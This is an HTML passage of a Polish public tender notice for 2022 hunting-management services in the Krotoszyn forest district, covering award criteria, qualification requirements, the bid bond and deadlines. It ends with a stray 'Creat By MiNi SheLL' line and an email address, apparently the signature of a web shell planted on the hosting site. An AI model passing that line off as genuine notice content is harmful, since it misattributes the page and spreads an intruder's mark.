zlecenie.<br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: (1) wystąpienia potrzeby<br/>zwiększenia zakresu rzeczowego usług stanowiących przedmiot zamówienia na skutek<br/>warunków przyrodniczych, klimatycznych bądź atmosferycznych, (2) zmian na rynku sprzedaży<br/>drewna lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych, (3)<br/>braku możliwości wyłonienia z przyczyn obiektywnych wykonawców usług leśnych w ramach<br/>podstawowych trybów udzielania zamówień oraz (4) powierzania wykonawcy prac stanowiących<br/>wykonawstwo zastępcze w stosunku do prac realizowanych przez innego wykonawcę. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">6. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214<br/>ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać<br/>będą na powtórzeniu usług podobnych do usług stanowiących przedmiot niniejszego zamówienia. Opis<br/>zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP został zawarty w rozdziale IV SWZ (Opis<br/>przedmiotu zamówienia).<br/>6.1 Zamówienia, o których mowa w pkt 6 będą polegały na powtórzeniu usług zgodnych z usługami<br/>stanowiącymi przedmiot niniejszego zamówienia oraz usług podobnych do nich w aspekcie<br/>technologicznym ich wykonawstwa. Zakresem rzeczowym usług stanowiących przedmiot zamówień, o<br/>których mowa w pkt 6 objęte będą prace z zakresu gospodarki leśnej obejmujące prace z zakresu<br/>gospodarki łowieckiej i obejmujące jednocześnie czynności wskazane rodzajowo w załączniku nr 8-9<br/>do SWZ.<br/>6.2 Zakres rzeczowy usług stanowiących przedmiot zamówień, o których mowa w pkt 6 nie przekroczy<br/>wartości 50 % wartości niniejszego zamówienia.<br/>6.3 Zamówienia, o których mowa w pkt 6 będą udzielane po przeprowadzeniu odrębnego<br/>postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.<br/>6.4 Zamówienia, o których mowa w pkt 6 będą udzielane w przypadku wystąpienia potrzebyzwiększenia zakresu rzeczowego usług stanowiących przedmiot zamówienia na skutek warunków<br/>przyrodniczych bądź atmosferycznych, zmian na rynku sprzedaży drewna lub powierzenia<br/>Zamawiającemu nowych zadań gospodarczych lub publicznych, jak również w sytuacji nie wyłonienia<br/>wykonawców usług leśnych w zakresie gospodarki łowieckiej w ramach podstawowych trybów<br/>udzielania zamówień.<br/>6.5 Miejscem realizacji zamówień, o których mowa w pkt 6 będzie obszar administracyjny Nadleśnictwa<br/>Krotoszyn.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1) Cena (C) – waga kryterium 60%;<br/>2) Samodzielna realizacja kluczowych elementów (części) zamówienia – waga kryterium 40%.<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 60%<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60%<br/>cena oferty ocenianej brutto *<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa (łączna) brutto podana<br/>przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z<br/>realizacją przedmiotu zamówienia.<br/>2) Samodzielna realizacja kluczowych elementów (części) zamówienia – waga kryterium 40%.<br/>Kryterium Samodzielna realizacja kluczowych elementów (części) zamówienia obejmuje „Zapewnienie<br/>własnego transportu dla myśliwych i naganiaczy przy użyciu samochodów terenowych (z napędem na<br/>cztery koła) umożliwiających transport min. 15 myśliwych i naganiaczy w trakcie jednego polowania.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do samodzielnej<br/>realizacji kluczowych części zamówienia w Ofercie (załącznik nr 1 do SIWZ). Brak wskazania w Ofercie<br/>przyjęcia przez Wykonawcę zobowiązania, o którym mowa w zdaniu poprzednim będzie uznawane<br/>jako nieprzyjęcie takiego zobowiązania, a Oferta Wykonawcy uzyska 0 pkt w ramach niniejszego<br/>kryterium oceny ofert. Oferta Wykonawcy, który zaciągnie takie zobowiązanie otrzyma 40 pkt.<br/>4. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą sumaryczną liczbę<br/>punktów po zastosowaniu wszystkich kryteriów oceny ofert.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści<br/>złożonej oferty, w tym zaoferowanej ceny.<br/>8. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja kluczowych elementów (części) zamówienia obejmuje „Zapewnienie własnego transportu dla myśliwych i naganiaczy przy użyciu samochodów terenowych (z napędem na cztery koła) umożliwiających transport min. 15 myśliwych i naganiaczy w trakcie jednego polowania.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) w zakresie doświadczenia , zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie) zrealizował lub realizuje na podstawie jednej lub<br/>większej ilości umów, co najmniej 1 usługę polegającą na wykonywaniu prac z zakresu<br/>gospodarki leśnej obejmujące prace z zakresu gospodarki łowieckiej, na kwotę nie mniejszą niż<br/>200.000,00 zł brutto;<br/>b) Warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że dysponuje lub będzie dysponować:<br/>1) co najmniej 1 szt. ciągników rolniczych o mocy nie mniejszej niż 40 KM.<br/>2) co najmniej 1 szt. agregatu uprawowego,<br/>3) co najmniej 1 szt. siewnika rolniczego,<br/>4) co najmniej 1 szt. rozsiewacza do nawozów,<br/>5) co najmniej 1 szt. pługa rolniczego.<br/>c)warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia.<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych, które Wykonawca składa w postępowaniu na wezwanie<br/>Zamawiającego na potwierdzenie braku podstaw do wykluczenia z postępowania:1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 10 pkt 4 Pzp, sporządzone nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">: Wykaz podmiotowych środków dowodowych, które Wykonawca składa w<br/>postępowaniu na wezwanie Zamawiającego na potwierdzenie spełniania warunków udziału w<br/>postępowaniu:<br/>1) Wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ilości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane; wzór wykazu usług stanowi<br/>Załącznik nr 5 do SWZ;<br/>2) Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami -<br/>Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 3000,00<br/>zł (słownie: trzy tysiące złotych 00/100 złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach: 1) pieniądzu; 2)<br/>gwarancjach bankowych; 3) gwarancjach ubezpieczeniowych; 4) poręczeniach udzielanych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku: PKO BP S.A.<br/>o/Kalisz nr rachunku 59 1020 2212 0000 5602 0349 4168 „Wadium – „Wykonywanie usług z<br/>zakresu gospodarki łowieckiej w Nadleśnictwie Krotoszyn w 2022r.- IV postępowanie”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania: 1) musi<br/>obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie p.z.p. 2) z jej treści powinno jednoznacznej wynikać<br/>zobowiązanie gwaranta do zapłaty całej kwoty wadium; 3) powinno być nieodwołalne i<br/>bezwarunkowe oraz płatne na pierwsze żądanie; 4) termin obowiązywania poręczenia lub<br/>gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym<br/>dniem związania ofertą jest dzień składania ofert); 5) w treści poręczenia lub gwarancji powinna<br/>znaleźć się nazwa oraz numer przedmiotowego postępowania; 6) beneficjentem poręczenia lub<br/>gwarancji jest: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo<br/>Krotoszyn 7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj.<br/>zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub<br/>nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o<br/>zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki ich wprowadzenia określa załącznik nr 4 - umowa <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-18 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com